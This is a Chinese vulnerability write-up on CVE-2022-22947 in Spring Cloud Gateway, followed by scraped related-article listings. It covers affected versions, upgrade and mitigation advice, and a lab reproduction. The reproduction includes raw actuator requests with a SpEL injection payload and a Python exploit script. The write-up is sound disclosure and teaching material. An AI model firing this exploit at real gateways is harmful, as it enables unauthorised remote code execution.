growing27
growing27

【漏洞分析】【spring-cloud-gateway】RCE CVE-2022-22947

0x00 概要

当Spring Cloud Gateway启用、暴露 和不安全Gateway Actuator 端点时,攻击者可以通过向使用 Spring Cloud Gateway 的应用程序发送特制的恶意请求,触发远程任意代码执行,利用难度低,目前POC已公开,风险较高。

Spring Cloud Gateway是基于Spring Framework 和 Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。

0x01 威胁级别

威胁级别:【严重】

0x02 影响范围

影响版本:
3.1.x系列:Spring Cloud Gateway < 3.1.
3.0.x系列:Spring Cloud Gateway < 3.0.7
其他旧的、不受支持的Spring Cloud Gateway版本

安全版本:
Spring Cloud Gateway >= 3.1.1
Spring Cloud Gateway >= 3.0.7

0x03 漏洞处置

1、目前官方已发布修复版本修复了该漏洞,请受影响的用户升级到安全版本:
https://github.com/spring-cloud/spring-cloud-gateway/tags
2、无法及时升级的用户,可参考官方提供的修复建议进行缓解:
如果不需要Gateway Actuator 端点,通过 management.endpoint.gateway.enabled: false 禁用它。

0x04 漏洞复现

  1. 下载spring-gateway-demo的jar包
    https://github.com/wdahlenburg/spring-gateway-demo/releases/download/v.0.0.1/spring-gateway-demo-0.0.1-SNAPSHOT.jar
  2. 运行spring-gateway-demo的jar包
    java -jar target/spring-gateway-demo-0.0.1-SNAPSHOT.jar
  3. 在浏览器中访问该微服务:
    http://127.0.0.1:9000/actuator/
  4. 发送报文创建新的路由
    注:此条中的命令为真正执行的命令,不同于条目5中的命令。
POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 127.0.0.1:9000
Connection: close
Content-Type: application/json
Content-Length: 382

{
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/new_route/**"
      }
    }
  ],
  "filters": [
    {
      "name": "RewritePath",
      "args": {
        "_genkey_0": "#{T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/x\")}",
        "_genkey_1": "/${path}"
      }
    }
  ],
  "uri": "https://wya.pl",
  "order": 0
}
  1. 刷新,成功执行命令
POST /actuator/gateway/refresh HTTP/1.1
Host: 127.0.0.1:9000
Content-Type: application/json
Connection: close
Content-Length: 268

{
  "predicate": "Paths: [/new_route], match trailing slash: true",
  "route_id": "new_route",
  "filters": [
    "[[RewritePath #{T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/x\")} = /${path}], order = 1]"
  ],
  "uri": "https://wya.pl",
  "order": 0
}

简单的利用脚本如下,python3 spring_cloud_RCE.py

#from itsdangerous import json
import requests

def exec(url):

    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36',
        'content-type':'application/json'
    }
    payload2 = '''{ "predicates": [ { "name": "Path", "args": { "_genkey_0": "/new_route/**" } } ], "filters": [ { "name": "RewritePath", "args": { "_genkey_0": "#{T(java.lang.Runtime).getRuntime().exec(\\\"touch /tmp/x\\\")}", "_genkey_1": "/${path}" } } ], "uri": "https://wya.pl", "order": 0 }'''
    payload1 = '''{ "predicate": "Paths: [/new_route], match trailing slash: true", "route_id": "new_route", "filters": [ "[[RewritePath #{T(java.lang.Runtime).getRuntime().exec(\\\"touch /tmp/x\\\")} = /${path}], order = 1]" ], "uri": "https://wya.pl", "order": 0 }'''

    print("payload2: " + payload2)    
    print("payload1: " + payload1)


    url2 = url + "/actuator/gateway/routes/new_route"
    url1 = url + "/actuator/gateway/refresh"
    
    re2 = requests.post(url=url2,data=payload2,headers=headers)
    print (re2, re2.content)
    re1 = requests.post(url=url1,data=payload1,headers=headers)
    print (re2, re1.content)


if __name__ == "__main__":
    exec("http://127.0.0.1:9000")

0x05 漏洞触发条件

  1. 需要spring-cloud-starter-gateway和spring-boot-starter-actuator同时存在,该利用路径其实是通过actuator进入的;
  2. 需要在actuator上开启gateway暴露
    在actuator 2.x系列中,web端默认只暴露了info和health,需要在配置文件中添加如下几行才会开启gateway暴露,利用才能成功。
management.endpoint.gateway.enabled=true
management.endpoints.web.exposure.include=gateway

References

https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
https://www.huaweicloud.com/notice/2022/20220303002755102.html
https://github.com/wdahlenburg/spring-gateway-demo
https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947
https://blog.csdn.net/alinyua/article/details/80009435

你可能感兴趣的:(【漏洞分析】【spring-cloud-gateway】RCE CVE-2022-22947)

  • discuz discuz_admincp.php 讲解,Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729) weixin_39740419 discuz讲解
    0x00漏洞简述漏洞信息8月27号有人在GitHub上公布了有关Discuz1.5-2.5版本中后台数据库备份功能存在的命令执行漏洞的细节。漏洞影响版本Discuz!1.5-2.50x01漏洞复现官方论坛下载相应版本就好。0x02漏洞分析需要注意的是这个漏洞其实是需要登录后台的,并且能有数据库备份权限,所以比较鸡肋。我这边是用Discuz!2.5完成漏洞复现的,并用此进行漏洞分析的。漏洞点在:so
  • 【漏洞复现】2023HVV WPS Office 远程代码执行漏洞(RCE) 李火火安全阁 漏洞复现应用安全WPSOffice
    文章目录前言声明一、漏洞描述二、影响范围三、漏洞复现服务端的功能客户端的功能四、修复建议前言2023HVV期间曝出的WPSOffice存在RCE漏洞,攻击者可通过该漏洞执行任意命令,获取服务器控制权限。声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
  • 【网络安全】漏洞挖掘之CVE-2019-9670+检测工具 秋说 网络安全web安全漏洞挖掘CVE
    未经许可,不得转载。文章目录漏洞介绍正文工具漏洞介绍CVE-2019-9670是一个与ZimbraCollaborationSuite(ZCS)相关的严重漏洞。ZCS中的AutoDiscover服务存在不正确的XML解析处理,该漏洞可被利用来注入恶意XML代码(例如外部实体注入(XXE)攻击),从而导致服务器任意文件读取或远程代码执行(RCE)。Zimbra]>
  • 微软九月补丁星期二发现了 79 个漏洞 网络研究观 网络研究观微软Windows系统安全漏洞更新版本
    微软将在2024年9月补丁星期二修复79个漏洞。微软有证据表明,发布的四个漏洞被野外利用和/或公开披露;所有四个漏洞均已在CISAKEV上列出。微软还在修补四个关键的远程代码执行(RCE)漏洞。不同寻常的是,微软本月尚未修补任何浏览器漏洞。当今最令人担忧的漏洞是CVE-2024-43491,它描述了一个预授权RCE漏洞。该漏洞是由Windows服务堆栈的回归引起的,该回归已回滚了对影响可选组件的许
  • 【漏洞复现】华三 H3C IMC 智能管理中心 /byod/index.xhtml RCE 凝聚力安全团队 漏洞复现xhtml前端htmlweb渗透web网络安全渗透测试
    免责声明:本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所
  • FFmpeg任意文件读取漏洞分析 音视频开发老马 ffmpeg
    背景介绍FFmpeg是一套目前非常流行的可以用来记录、转换数字音频、视频,并能将其转化为流的开源计算机程序。它提供了录制、转换以及流化音视频的完整解决方案。目前有非常多的视音频软件或是视频网站、手机APP都采用了这个库,但是这个库历史上曝出的漏洞也非常之多。这次的漏洞是利用了ffmpeg可以处理HLS播放列表的功能,在AVI文件中的GAB2字幕块中嵌入了一个HLS文件,然后提供给ffmpeg进行转
  • 命令执行漏洞和代码执行漏洞 燕雀安知鸿鹄之志哉. 渗透测试笔记web安全网络安全经验分享安全笔记
    命令执行漏洞(CommandExecutionVulnerability)和代码执行漏洞(CodeExecutionVulnerability)都是远程代码执行(RemoteCodeExecution,RCE)的类型,它们允许攻击者在目标系统上执行任意命令或代码。主要区别命令执行漏洞通常涉及直接调用操作系统命令。攻击者通过利用应用程序中的安全漏洞,将恶意的操作系统命令注入到应用程序的执行流程中,从
  • Spring-Cloud-Gateway之请求处理流程 liuweidong0802 spring
    Spring-Cloud-Gateway初始化,路由模型,以及路由加载等源码在上几篇学习文档中已经描述,接下来来看Spring-Cloud-Gateway是怎么通过这些来对我们的请求进行路由处理的Spring-Cloud-Gateway整体流程图imageDispatcherHandler:所有请求的调度器,负载请求分发RoutePredicateHandlerMapping:路由谓语匹配器,用于
  • CVE-2024-25852 Linksys RE7000无线扩展器 RCE漏洞 抠脚大汉在网络 漏洞复现漏洞漏洞
    文章目录免责声明漏洞描述漏洞原理影响版本漏洞复现修复建议免责声明本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任漏洞描述RE7000是Linksys推出的一款具有无缝漫游功能的双频AC1900无线扩展器,重点是withseamlessroaming(无缝漫游)漏洞原理RE7000无线扩展器在访问/goform/AccessControl功能接口时在Access
  • 【web安全】从2022中科大hackgame web中学习pdflatex RCE和python反序列化 热心网友易小姐 pythonweb安全前端
    ctf比赛地址:https://hack.lug.ustc.edu.cn大佬博客里wp写的很清楚了,官方wp也写的很好,我比不过大佬,只能把基础多讲一些(大佬在tttang把wp全发了T0T)官方wp:https://github.com/USTC-Hackergame/hackergame2022-writeups大佬全WP:https://miaotony.xyz/?utm_source=tt
  • 学会辨识「漏洞炒作」你就比别人强! 强哥叨逼叨
    点击关注强哥,查看更多精彩文章呀哈喽,大家好,我是强哥。昨天,最受欢迎的开源轻量级Java框架Spring被曝存在高危的RCE(远程控制设备)零日漏洞,北京大学计算中心、外媒praetorian、bleepingcomputer等站点对该漏洞进行了报道。炒作强哥也看到了很多媒体疯狂报道此事,根据网上疯传的介绍,该RCE漏洞源于Spring框架核心的SerializationUtils#dseria
  • CTFHub技能树web之RCE(二) wz_fisher 网络安全
    第五题:远程包含根据题目,使用远程包含进行打开phpinfo,可以看到allow_url_fopen和allow_url_include都是On,因此可以使用php://input,由于代码会检查file中的内容,因此不能够使用php://filter包含文件,使用php://input通过hackbar使用POST方式发包,抓包并在最后一行加php代码执行成功得到flag第六题:命令注入首先熟悉
  • CTFHub技能树web之RCE(一) wz_fisher 网络安全
    RCE是php的代码执行简称,是RemoteCommandExec(远程命令执行)和RemoteCodeExec(远程代码执行)的缩写;Command指的是操作系统的命令,code指的是脚本语言(php)的代码。第一题:eval执行根据代码可以看到该网页使用request得到cmd参数并使用eval执行cmd的代码,其中isset函数用于检测是否传入了一个名为cmd的变量的值(是否非空),eval
  • 【Web】CTFSHOW java刷题记录(全) Z3r4y javactfshowstruts2strutsrcecveweb
    目录web279web280web281web282web283web284web285web286web287web288web289web290web291web292web293web294web295web296web297web298web299web300web279题目提示url里告诉我们是S2-001直接进行一个exp的搜S2-001漏洞分析-CSDN博客payload:%{#a=
  • Struts2 S2-045漏洞复现 你能拿我咋的 渗透测试漏洞复现strutsjavaweb安全
    1.漏洞概述OGNL是ObjectGraphicNavigationLanguage(对象图导航语言)的缩写,它是一个开源项目。Struts框架使用OGNL作为默认的表达式语言。struts2的rce本质都是一样的(除了S2-052以外),都是Struts2框架执行了恶意用户传进来的OGNL表达式,造成远程代码执行。可以造成“命令执行、服务器文件操作、打印回显、获取系统属性、危险代码执行”等,只不
  • Nacos系统历史CVE漏洞的复现分析与检测 Tr0e 漏洞分析Nacos漏洞
    文章目录前言CVE-2021-29441认证绕过1.1环境搭建与复现1.2漏洞源码的分析1.3修复方案被绕过1.4衍生的默认凭据QVD-2023-6271默认密钥2.1环境搭建与复现2.2漏洞修复与现状2.3CVE-2021-43116CNVD-2020-67618SQL注入3.1环境搭建与复现3.2漏洞分析与修复3.3Nacos漏洞ToolsCNVD-2023-45001反序列化4.1环境搭建与
  • Apache Apisix网关系统历史漏洞复现分析 Tr0e 漏洞分析Apisix漏洞
    文章目录前言CVE-2020-13945默认api令牌CVE-2021-45232未授权接口2.1默认账户密码导致RCE2.2未授权访问api接口RCECVE-2022-24112地址限制绕过CVE-2022-29266JWT令牌伪造4.1漏洞源码简析与修复4.2漏洞环境搭建与复现总结前言ApacheAPISIX是一个动态、实时、高性能的API网关,提供负载均衡、动态上游、灰度发布、服务熔断、身份
  • Panalog 日志审计系统 sessiptbl.php 前台RCE漏洞复现 OidBoy_G 漏洞复现安全web安全
    0x01产品简介Panalog是一款日志审计系统,方便用户统一集中监控、管理在网的海量设备。0x02漏洞概述Panalog日志审计系统sessiptbl.php接口处存在远程命令执行漏洞,攻击者可执行任意命令,接管服务器权限。0x03影响范围version<=MARSr10p1Free0x04复现环境FOFA:app="Panabit-Panalog"0x05漏洞复现PoCPOST/sessipt
  • 7.Cloud-GateWay wang_peng SpringCloudjavaspringspringboot
    0.概述https://cloud.spring.io/spring-cloud-static/spring-cloud-gateway/2.2.1.RELEASE/reference/html/1.入门配置1.1POMorg.springframework.cloudspring-cloud-starter-gatewaycom.alibaba.cloudspring-cloud-starter
  • CVE-2022-22947 Spring Cloud Gateway RCE漏洞复现分析 @Camelus vulhub漏洞复现springcloudweb安全网络安全安全
    目录(一)基本介绍1、微服务架构与SpringCloud2、SpringCloud生态3、网关作用4、SpringCloudGateway使用5、SpringCloudGateway概念5.1路由(Route)5.2断言(Predicate)5.3过滤器(Filter)6、SpringBootActuator6.1使用方法7、Gateway(网关服务)和Actuator(监控组件)8、Actuat
  • 【Web】CVE-2022-22947 SpringCloud Gateway SpEL漏洞学习 Z3r4y springcloudgatewayvulhubctfwebCVE-2022-22947CVE
    目录简介Actuator操作Gateway接口列表复现流程漏洞复现简单原理简介SpringBootActuator和SpringCloudGateway是Spring生态系统中的两个关键组件,它们在微服务架构中扮演着不同的角色,下面简要介绍它们之间的关系:SpringBootActuator:SpringBootActuator是SpringBoot提供的一个功能强大的监控和管理端点,可以用于监视
  • BUGKU--web详解 小蓝同学` 信息安全漏洞bugkuCTFwebweb漏洞
    web4-web?前言Web4Web5Web6Web7Web--社工game1Web11社工-伪造WEB12--本地管理员Web8Web9Web10Web13Web14-伪协议(rce漏洞)前言  听说bugku的题很适合新手我就来了,感觉前几题都比较简单也没什么好总结的,就从第四题开始吧,后面要是碰到简单的估计只会略微提起几句,大家要是有不理解的知识点,可以私信我。Web4  就是考察简单的代码
  • 朋友圈投票活动-刷票案例实现与分析 Ragty_ 计算机网络
    1.声明本文只讨论技术范畴内的刷票行为。2.案例描述某商城(以下简称A商城)在微信平台上举办了一场在线投票活动,微信用户可通过活动链接访问到投票页面,对喜欢的作品进行投票;每个微信帐号每天只能给单个作品投1张选票3.漏洞分析表面上看,A商城已经对投票活动进行了反作弊处理,因为限制了每个微信用户每天只能投一张票。如果用户都是正常地通过微信访问这个投票服务进行投票的话,的确是能起到预期效果的。然而,如
  • BUUCTF-Real-[Jupyter]notebook-rce 真的学不了一点。。。 漏洞复现与研究jupyter安全ide网络安全
    1、简介JupyterNotebook(此前被称为IPythonnotebook)是一个交互式笔记本,支持运行40多种编程语言。如果管理员未为JupyterNotebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。2、复现环境buuctfGithub这里我使用buuctf进行复现,图个简单方便!3、漏洞复现直接新建一个终端窗口即可!!也可以
  • NSSCTF-[SWPUCTF 2023 秋季新生赛]-web J1ng_Hong 前端
    目录0x01[SWPUCTF2023秋季新生赛]If_else0x02[SWPUCTF2023秋季新生赛]RCE-PLUS0x03[SWPUCTF2023秋季新生赛]Pingpingping0x04[SWPUCTF2023秋季新生赛]一键连接!0x05[SWPUCTF2023秋季新生赛]NSS_HTTP_CHEKER0x06[SWPUCTF2023秋季新生赛]NSS大卖场0x07[SWPUCTF2
  • 网安常用的三个攻击方式 Passion-优 网络安全红队
    1.渗透测试执行标准(PTES)渗透测试执行标准由7个部分组成,包括前期交互、情报收集、威胁建模、漏洞分析、渗透利用、后渗透、撰写报告。在中国,渗透测试必须经过授权,否则就违背了网络安全法。前期交互主要指开展渗透测试工作前,与客户进行沟通和交流,确定测试范围、目标、限制条件及相关要求,以及签订合同等,主要是前期的准备工作。情报收集主要指通过主动或被动方式收集渗透测试相关的信息,比如目标网络、端口、
  • 快看!比KaliLinux更炫酷的鹦鹉OS系统!! 知攻善防实验室 网络安全渗透测试Web渗透黑客操作系统
    注本公众号,长期推送技术文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。79篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!前言本期介绍的为parr
  • 帮管客 存在用户信息泄露-漏洞复现-附EXP 知攻善防实验室 漏洞复现信息安全网络安全
    注本公众号,长期推送技术文章知攻善防实验室红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源工具,社工钓鱼,网络安全。78篇原创内容公众号免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!前言帮管客是一款基于移动
  • N1CTF奖品一个月的ZoomEye账户使用与子域名收集(网络渗透测) Stitch . CTF我的大学笔记网络
    首页-网络空间测绘,网络安全,漏洞分析,动态测绘,钟馗之眼,时空测绘,赛博测绘-ZoomEye("钟馗之眼")网络空间搜索引擎https://www.zoomeye.org/ZoomEye-CyberspaceSearchEnginehttps://www.zoomeye.org/aboutZoomEye(“钟馗之眼”)是知道创宇旗下404实验室驱动打造的网络空间搜索引擎。通过分布在全球的大量测绘
  • CTFshow web(php命令执行 55-59) 补天阁 php开发语言CTFShowweb安全
    web55|\|\|\<|\.|\,|\?|\*|\-|\=|\[/i",$c)){system("cat".$c.".php");}}else{highlight_file(__FILE__);}这里一句话:其实就是构造出36问题是过滤了数字的情况下怎么弄出36那就回到了无回显RCE问题了原理是:${_}=""$((${_}))=0$((~$((${_}))))=-1然后拼接出-36再进行取反/
  • 矩阵求逆(JAVA)初等行变换 qiuwanchi 矩阵求逆(JAVA)
    package gaodai.matrix; import gaodai.determinant.DeterminantCalculation; import java.util.ArrayList; import java.util.List; import java.util.Scanner; /** * 矩阵求逆(初等行变换) * @author 邱万迟 *
  • JDK timer antlove javajdkschedulecodetimer
    1.java.util.Timer.schedule(TimerTask task, long delay):多长时间(毫秒)后执行任务 2.java.util.Timer.schedule(TimerTask task, Date time):设定某个时间执行任务 3.java.util.Timer.schedule(TimerTask task, long delay,longperiod
  • JVM调优总结 -Xms -Xmx -Xmn -Xss coder_xpf jvm应用服务器
    堆大小设置JVM 中最大堆大小有三方面限制:相关操作系统的数据模型(32-bt还是64-bit)限制;系统的可用虚拟内存限制;系统的可用物理内存限制。32位系统下,一般限制在1.5G~2G;64为操作系统对内存无限制。我在Windows Server 2003 系统,3.5G物理内存,JDK5.0下测试,最大可设置为1478m。 典型设置: java -Xmx
  • JDBC连接数据库 Array_06 jdbc
    package Util; import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; public class JDBCUtil { //完
  • Unsupported major.minor version 51.0(jdk版本错误) oloz java
    java.lang.UnsupportedClassVersionError: cn/support/cache/CacheType : Unsupported major.minor version 51.0 (unable to load class cn.support.cache.CacheType) at org.apache.catalina.loader.WebappClassL
  • 用多个线程处理1个List集合 362217990 多线程threadlist集合
      昨天发了一个提问,启动5个线程将一个List中的内容,然后将5个线程的内容拼接起来,由于时间比较急迫,自己就写了一个Demo,希望对菜鸟有参考意义。。 import java.util.ArrayList; import java.util.List; import java.util.concurrent.CountDownLatch; public c
  • JSP简单访问数据库 香水浓 sqlmysqljsp
    学习使用javaBean,代码很烂,仅为留个脚印 public class DBHelper { private String driverName; private String url; private String user; private String password; private Connection connection; privat
  • Flex4中使用组件添加柱状图、饼状图等图表 AdyZhang Flex
    1.添加一个最简单的柱状图 ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 <?xml version= "1.0"&n
  • Android 5.0 - ProgressBar 进度条无法展示到按钮的前面 aijuans android
    在低于SDK < 21 的版本中,ProgressBar 可以展示到按钮前面,并且为之在按钮的中间,但是切换到android 5.0后进度条ProgressBar 展示顺序变化了,按钮再前面,ProgressBar 在后面了我的xml配置文件如下:   [html]  view plain copy   <RelativeLa
  • 查询汇总的sql baalwolf sql
    select   list.listname, list.createtime,listcount from dream_list as list ,   (select listid,count(listid) as listcount  from dream_list_user  group by listid  order by count(
  • Linux du命令和df命令区别 BigBird2012 linux
            1,两者区别             du,disk usage,是通过搜索文件来计算每个文件的大小然后累加,du能看到的文件只是一些当前存在的,没有被删除的。他计算的大小就是当前他认为存在的所有文件大小的累加和。        
  • AngularJS中的$apply,用还是不用? bijian1013 JavaScriptAngularJS$apply
            在AngularJS开发中,何时应该调用$scope.$apply(),何时不应该调用。下面我们透彻地解释这个问题。         但是首先,让我们把$apply转换成一种简化的形式。         scope.$apply就像一个懒惰的工人。它需要按照命
  • [Zookeeper学习笔记十]Zookeeper源代码分析之ClientCnxn数据序列化和反序列化 bit1129 zookeeper
    ClientCnxn是Zookeeper客户端和Zookeeper服务器端进行通信和事件通知处理的主要类,它内部包含两个类,1. SendThread 2. EventThread, SendThread负责客户端和服务器端的数据通信,也包括事件信息的传输,EventThread主要在客户端回调注册的Watchers进行通知处理   ClientCnxn构造方法   &
  • 【Java命令一】jmap bit1129 Java命令
    jmap命令的用法:   [hadoop@hadoop sbin]$ jmap Usage: jmap [option] <pid> (to connect to running process) jmap [option] <executable <core> (to connect to a
  • Apache 服务器安全防护及实战 ronin47
    此文转自IBM. Apache 服务简介 Web 服务器也称为 WWW 服务器或 HTTP 服务器 (HTTP Server),它是 Internet 上最常见也是使用最频繁的服务器之一,Web 服务器能够为用户提供网页浏览、论坛访问等等服务。 由于用户在通过 Web 浏览器访问信息资源的过程中,无须再关心一些技术性的细节,而且界面非常友好,因而 Web 在 Internet 上一推出就得到
  • unity 3d实例化位置出现布置? brotherlamp unity教程unityunity资料unity视频unity自学
    问:unity 3d实例化位置出现布置? 答:实例化的同时就可以指定被实例化的物体的位置,即 position  Instantiate (original : Object, position : Vector3, rotation : Quaternion) : Object 这样你不需要再用Transform.Position了,   如果你省略了第二个参数(
  • 《重构,改善现有代码的设计》第八章 Duplicate Observed Data bylijinnan java重构
    import java.awt.Color; import java.awt.Container; import java.awt.FlowLayout; import java.awt.Label; import java.awt.TextField; import java.awt.event.FocusAdapter; import java.awt.event.FocusE
  • struts2更改struts.xml配置目录 chiangfai struts.xml
    struts2默认是读取classes目录下的配置文件,要更改配置文件目录,比如放在WEB-INF下,路径应该写成../struts.xml(非/WEB-INF/struts.xml) web.xml文件修改如下:   <filter> <filter-name>struts2</filter-name> <filter-class&g
  • redis做缓存时的一点优化 chenchao051 redishadooppipeline
            最近集群上有个job,其中需要短时间内频繁访问缓存,大概7亿多次。我这边的缓存是使用redis来做的,问题就来了。       首先,redis中存的是普通kv,没有考虑使用hash等解结构,那么以为着这个job需要访问7亿多次redis,导致效率低,且出现很多redi
  • mysql导出数据不输出标题行 daizj mysql数据导出去掉第一行去掉标题
    当想使用数据库中的某些数据,想将其导入到文件中,而想去掉第一行的标题是可以加上-N参数 如通过下面命令导出数据: mysql -uuserName -ppasswd -hhost -Pport -Ddatabase -e " select * from tableName"  > exportResult.txt 结果为: studentid
  • phpexcel导出excel表简单入门示例 dcj3sjt126com PHPExcelphpexcel
    先下载PHPEXCEL类文件,放在class目录下面,然后新建一个index.php文件,内容如下 <?php error_reporting(E_ALL); ini_set('display_errors', TRUE); ini_set('display_startup_errors', TRUE);   if (PHP_SAPI == 'cli') die('
  • 爱情格言 dcj3sjt126com 格言
     1) I love you not because of who you are, but because of who I am when I am with you.    我爱你,不是因为你是一个怎样的人,而是因为我喜欢与你在一起时的感觉。   2) No man or woman is worth your tears, and the one who is, won‘t
  • 转 Activity 详解——Activity文档翻译 e200702084 androidUIsqlite配置管理网络应用
    activity 展现在用户面前的经常是全屏窗口,你也可以将 activity 作为浮动窗口来使用(使用设置了 windowIsFloating 的主题),或者嵌入到其他的 activity (使用 ActivityGroup )中。 当用户离开 activity 时你可以在 onPause() 进行相应的操作 。更重要的是,用户做的任何改变都应该在该点上提交 ( 经常提交到 ContentPro
  • win7安装MongoDB服务 geeksun mongodb
    1.  下载MongoDB的windows版本:mongodb-win32-x86_64-2008plus-ssl-3.0.4.zip,Linux版本也在这里下载,下载地址: http://www.mongodb.org/downloads   2.  解压MongoDB在D:\server\mongodb, 在D:\server\mongodb下创建d
  • Javascript魔法方法:__defineGetter__,__defineSetter__ hongtoushizi js
    转载自: http://www.blackglory.me/javascript-magic-method-definegetter-definesetter/ 在javascript的类中,可以用defineGetter和defineSetter_控制成员变量的Get和Set行为 例如,在一个图书类中,我们自动为Book加上书名符号: function Book(name){
  • 错误的日期格式可能导致走nginx proxy cache时不能进行304响应 jinnianshilongnian cache
    昨天在整合某些系统的nginx配置时,出现了当使用nginx cache时无法返回304响应的情况,出问题的响应头: Content-Type:text/html; charset=gb2312 Date:Mon, 05 Jan 2015 01:58:05 GMT Expires:Mon , 05 Jan 15 02:03:00 GMT Last-Modified:Mon, 05
  • 数据源架构模式之行数据入口 home198979 PHP架构行数据入口
    注:看不懂的请勿踩,此文章非针对java,java爱好者可直接略过。   一、概念 行数据入口(Row Data Gateway):充当数据源中单条记录入口的对象,每行一个实例。   二、简单实现行数据入口 为了方便理解,还是先简单实现: <?php /** * 行数据入口类 */ class OrderGateway { /*定义元数
  • Linux各个目录的作用及内容 pda158 linux脚本
    1)根目录“/”   根目录位于目录结构的最顶层,用斜线(/)表示,类似于 Windows 操作系统的“C:\“,包含Fedora操作系统中所有的目录和文件。   2)/bin   /bin   目录又称为二进制目录,包含了那些供系统管理员和普通用户使用的重要 linux命令的二进制映像。该目录存放的内容包括各种可执行文件,还有某些可执行文件的符号连接。常用的命令有:cp、d
  • ubuntu12.04上编译openjdk7 ol_beta HotSpotjvmjdkOpenJDK
    获取源码 从openjdk代码仓库获取(比较慢) 安装mercurial Mercurial是一个版本管理工具。 sudo apt-get install mercurial 将以下内容添加到$HOME/.hgrc文件中,如果没有则自己创建一个: [extensions] forest=/home/lichengwu/hgforest-crew/forest.py fe
  • 将数据库字段转换成设计文档所需的字段 vipbooks 设计模式工作正则表达式
            哈哈,出差这么久终于回来了,回家的感觉真好!         PowerDesigner的物理数据库一出来,设计文档中要改的字段就多得不计其数,如果要把PowerDesigner中的字段一个个Copy到设计文档中,那将会是一件非常痛苦的事情。
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他